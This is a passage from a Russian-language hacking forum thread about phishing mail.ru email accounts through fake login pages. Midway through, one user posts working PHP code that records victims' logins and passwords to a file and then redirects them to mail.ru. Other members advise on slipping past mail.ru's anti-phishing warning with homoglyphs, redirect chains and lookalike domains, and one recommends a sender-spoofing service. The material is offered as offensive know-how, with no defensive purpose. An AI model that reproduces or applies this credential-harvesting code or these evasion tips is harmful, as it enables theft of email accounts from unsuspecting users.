Авторские статьи Взлом почты на mail.ru [СИ]

Discussion in 'Статьи' started by Chaak, 6 Jun 2008.

  1. Validol

    Validol Elder - Старейшина

    Joined:
    15 Dec 2006
    Messages:
    177
    Likes Received:
    57
    Reputations:
    7
    Прям так копировать.
    Код предназначен для записи логина и пароля с mail.ru.



    это комментарии... :rolleyes:
     
    #81 Validol, 23 Oct 2009
    Last edited: 23 Oct 2009
  2. Гота

    Гота New Member

    Joined:
    9 Oct 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Вопрос такой, если я отправила письмо в хтмл формате, а у меня в отправленных просто этот код, получателю придет то , что должно придти?
     
  3. Torentte

    Torentte New Member

    Joined:
    3 Oct 2009
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    Отправь таким способом на другой свой емейл и посмотри как будет выглядеть...
     
  4. Mr.Replica

    Mr.Replica Member

    Joined:
    18 May 2010
    Messages:
    124
    Likes Received:
    41
    Reputations:
    10
    у меня есть мыльник на маиле спец.для СИ. если чё,пиши в личку
     
  5. oldsys

    oldsys Member

    Joined:
    4 Jan 2010
    Messages:
    31
    Likes Received:
    5
    Reputations:
    0
    Вот почему не надо читать письма от незнакомых людей ! =)
     
  6. Babkin

    Babkin New Member

    Joined:
    23 Jan 2010
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Ребята, помогите пожалуйста. Желание научиться есть. Но и пара вопросов появилась.

    Я сделал все так, как в первом посте, но при отсылке письма на другой ящик, письмо блокируется сообщением следующего содержания:

    Внимание! Администрация mail.ru никогда не запросит у Вас ваши логин и пароль.

    Как я понял вся беда в сниффере:
    PHP:
    <?php
    $f
    =fopen("mail.txt","at"); # файл куда сохранять
    flock($f,2);
    fputs($f,$_GET['Login']."@"); #логин
    fputs($f,$_GET['Domain']); #домен
    fputs($f,";".$_GET['Password']."\n"); # пароль
    flock($f,3);
    fclose($f);
    ?>
    <script>document.location.href="http://win.mail.ru/cgi-bin/readmsg?id=121112312";</script>
    А именно в теге <script>. Как можно обойти подобное? Посоветуйте, пожалуйста.

    Разумеется в файле моем комментариев нет.
     
    #86 Babkin, 24 Jan 2010
    Last edited: 24 Jan 2010
  7. lmns

    lmns Elder - Старейшина

    Joined:
    21 Feb 2007
    Messages:
    195
    Likes Received:
    111
    Reputations:
    8
    Не в сниффере, а в письме которое посылаешь. Скрипт майла реагирует так на слово пароль.
     
  8. Babkin

    Babkin New Member

    Joined:
    23 Jan 2010
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Хм, и как тогда обойти сие?
     
  9. DRONING

    DRONING Member

    Joined:
    16 Oct 2009
    Messages:
    109
    Likes Received:
    6
    Reputations:
    0
    если правда реагирует на силово пароль то попробуй написать слово пароль так: пa(латинская)роль
     
  10. Babkin

    Babkin New Member

    Joined:
    23 Jan 2010
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    не прокатило =( вероятно все дело в самих командах.
     
  11. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    все дело в редиректе, у тебя указывет что ссылка ведет на внешний сайт(в твоем случае фейк), а надо так ссылка на майл- редирект на фейк (каждый использует лично свои редиректы и выкладывать их здесь наврядли будут- т к майл быстро все это дело фиксет)
     
  12. lmns

    lmns Elder - Старейшина

    Joined:
    21 Feb 2007
    Messages:
    195
    Likes Received:
    111
    Reputations:
    8
    И это всё? сдался? Может кто-нибудь попробует подумать?
    Убери слово пароль наxyй из письма и посмотри результат. Предупреждение пропало? Отлично! думаем дальше, как бы нам всё же оставить это слово и чтоб малрушный скрипт не сдавал нас с потрохами. И не надо больше преждевременных неправильных выводов.
     
    #92 lmns, 24 Jan 2010
    Last edited: 24 Jan 2010
  13. Babkin

    Babkin New Member

    Joined:
    23 Jan 2010
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Месяц посвятил этому. Слово "пароль" убрал. Не помогло.
     
  14. lmns

    lmns Elder - Старейшина

    Joined:
    21 Feb 2007
    Messages:
    195
    Likes Received:
    111
    Reputations:
    8
    Babkin скинь в PM письмо которое посылаешь.
     
  15. hijack24

    hijack24 New Member

    Joined:
    1 Mar 2010
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    перезалейте архив плз!!!
    для отправки письма с подменой адреса советую bogomol.net/incom/
     
    #95 hijack24, 19 Mar 2010
    Last edited: 19 Mar 2010
  16. DSL@

    DSL@ Member

    Joined:
    23 Feb 2010
    Messages:
    0
    Likes Received:
    11
    Reputations:
    0
    я угораю эта статья была в 2008 пиши в ПМ челу может дает если сидит тут досихпор
     
  17. TreV@N

    TreV@N Elder - Старейшина

    Joined:
    14 Jul 2008
    Messages:
    135
    Likes Received:
    48
    Reputations:
    19
    Перезалейте скрипт от Ponchik'а!!!
     
  18. Byte_

    Byte_ Elder - Старейшина

    Joined:
    7 Sep 2008
    Messages:
    143
    Likes Received:
    34
    Reputations:
    2
    Помнится была ещё тема с открытками. Там когда хотим посмотреть открытку переадресует на страницу с логином/паролем. Соответственно подменяем эту страницу на свою.

    Кстати проверка на урл сайта куда идёт переход с формы в письме проверяется яваскриптом под телом письма и должен содержать "mail.ru". я так понимаю, если забить домен mail.ru.anydomen.ru, то прокатит и этот фейк.

    Кстати следует задуматься над тем, что не обязательно вообще регить какой бы то не было хостинг, нужно реализовать отправку сообщения внутри mail.ru. Это явно поможет обойти защиту.

    Только вот как это сделать я пока слабо представляю, хотя мысли есть.
     
  19. Eff0rd

    Eff0rd Elder - Старейшина

    Joined:
    2 Jun 2009
    Messages:
    271
    Likes Received:
    334
    Reputations:
    37
    хорошая статья, а прочитал только сегодня. Когда научусь делать что то лучше других - напишу статью тоже!
     
  20. Zigert

    Zigert Member

    Joined:
    24 Jun 2009
    Messages:
    50
    Likes Received:
    8
    Reputations:
    0
    да,не плохо все расписано